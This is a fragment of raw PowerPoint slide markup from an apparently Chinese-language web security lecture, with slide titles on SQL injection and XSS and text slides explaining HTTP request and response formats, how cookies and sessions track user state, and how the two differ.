              <a:latin typeface="pingfang SC"/>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1927656" y="282"/>
            <a:ext cx="9648394" cy="781967"/>
            <a:chOff x="2543606" y="42192"/>
            <a:chExt cx="9648394" cy="781967"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4"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p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2831637" y="138202"/>
              <a:ext cx="2222083" cy="502445"/>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SQL注入实例</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9218"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656" y="924553"/>
            <a:ext cx="9126538" cy="5419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90340" y="2456815"/>
            <a:ext cx="4956810" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1"/>
              <a:t>XSS跨站脚本攻击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314167E-FA4E-87E9-1CFA-C9E7D2833033}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2007918" y="597271"/>
            <a:ext cx="8786751" cy="5194312"/>
            <a:chOff x="1960417" y="799152"/>
            <a:chExt cx="8786751" cy="5194312"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2" name="图片 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C01DF45D-26CE-E2D7-01CA-309D2EA21BE5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1960417" y="799152"/>
              <a:ext cx="8786751" cy="5194312"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92D31CDB-6C46-8D07-2457-E5243020363D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7291450" y="4013860"/>
              <a:ext cx="1116280" cy="41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 name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73174BE0-2F4E-06E2-FD6E-D7FE1C98DF9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7491351" y="3964379"/>
            <a:ext cx="1116280" cy="41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931B3D93-CBAB-8166-524E-DCD34D158089}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7643751" y="4116779"/>
            <a:ext cx="1116280" cy="41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34FB2DD8-6EAC-3C6C-4F9C-018377BBC259}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1785152" y="169086"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA4819BF-938A-686F-8343-9DF187A82170}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2073183" y="265096"/>
            <a:ext cx="2488951"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请求格式</a:t>
            </a:r>
            <a:endParaRPr sz="2665" b="1" kern="10" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3493099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582F176-B44B-1B33-AE23-57381726D4C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="1452378"/>
            <a:ext cx="7772400" cy="3537603"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C03B174-311B-BD6A-DFAA-2C6975AB6A72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7528956" y="2805542"/>
            <a:ext cx="1116280" cy="41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088D55B0-92F4-5A46-AD49-8EE4CE5CF488}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1785152" y="169086"/>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 name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BAA7365-CBED-06F6-B119-AF36D57B102F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2073183" y="265096"/>
            <a:ext cx="2488951"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HTTP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响应格式</a:t>
            </a:r>
            <a:endParaRPr sz="2665" b="1" kern="10" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3281125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CC1AFE-B295-E49E-A288-22BF613C2608}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="1245608"/>
            <a:ext cx="7772400" cy="4366783"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D70AE99-7274-E6D4-9A9D-BFE4E5ADA4F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5537860" y="3304307"/>
            <a:ext cx="1116280" cy="4156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9EF18BB2-904C-274E-8150-0778AF869A2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5405252" y="2125684"/>
            <a:ext cx="936171" cy="2018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0C10CF4F-85F0-1D13-4617-82C4588D77A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5537860" y="4831278"/>
            <a:ext cx="936171" cy="2018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BE420B6C-0341-60FC-8149-F11631C68A78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1785152" y="169086"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27A3C3F8-AACF-799F-4C46-0EFBEE24E1F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2073183" y="265096"/>
            <a:ext cx="2392001" cy="502445"/>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Cookie</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的产生</a:t>
            </a:r>
            <a:endParaRPr sz="2665" b="1" kern="10" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="215157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74A73EC-B36B-324F-A811-CAEF1007C1FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953768" y="4557787"/>
            <a:ext cx="7772400" cy="679938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9660A7F3-3171-0538-02F0-1F164E9D9573}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953768" y="0"/>
            <a:ext cx="7772400" cy="4309814"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6509D77-002C-BE3E-4B92-142EB5C791E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect b="25889"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3998976" y="5323069"/>
            <a:ext cx="2097024" cy="1197703"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2394805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35699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Cookie</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1802765" y="781685"/>
            <a:ext cx="10269855" cy="1938020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cookie的诞生</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>由于HTTP协议是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>无状态</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>的（服务器无法判断用户身份），而服务器端的业务必须是要有状态的。Cookie诞生的最初目的是为了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>存储web中的状态信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，以方便服务器端使用。比如判断用户是否是第一次访问网站。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6287770" y="2846705"/>
            <a:ext cx="5784850" cy="2892425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1802765" y="2719705"/>
            <a:ext cx="4476115" cy="3415030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Cookie的处理分为：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>客户端向服务器发起请求</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务器向客户端发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ookie</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>浏览器将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ookie保存</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>之后每次http请求浏览器都会将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ookie发送给服务器端：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Set-Cookie字段</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务器检查该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ookie，以此来辨认用户状态。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8776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46240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Session</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="932815"/>
            <a:ext cx="9867265" cy="4523105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>　Session是服务器端使用的一种记录客户端状态的机制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，使用上比Cookie简单一些，相应的也增加了服务器的存储压力。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>　　客户端浏览器访问服务器的时候，服务器把客户端信息以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>形式记录在服务器上。客户端浏览器再次访问时只需要从该Session中查找该客户的状态就可以了。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>　　如果说</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>机制是通过检查客户身上的“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>通行证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>”来确定客户身份的话，那么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>机制就是通过检查服务器上的“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>客户明细表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>”来确认客户身份。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>　　Session相当于程序在服务器上建立的一份客户档案，客户来访的时候只需要查询客户档案表就可以了。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2201665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34B64C-1F50-1DD8-1A78-23C44A8F30E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1985157" y="1233741"/>
            <a:ext cx="8709563" cy="4390518"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DEB7987-BD05-C805-CC24-1C75F11C4373}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1923803"/>
            <a:ext cx="936171" cy="2018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B3220870-7ED0-954A-ACDB-864D02222EF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6147460" y="4387932"/>
            <a:ext cx="936171" cy="2018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63AA5F1F-BCFC-85A1-8063-75E14EA88AC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1785152" y="169086"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D94861C0-9097-C608-FFEA-5FDD5388BC5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1985157" y="309244"/>
            <a:ext cx="390334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cookie和session的区别</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="711585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73885" y="908685"/>
            <a:ext cx="9856470" cy="5631180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>１、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
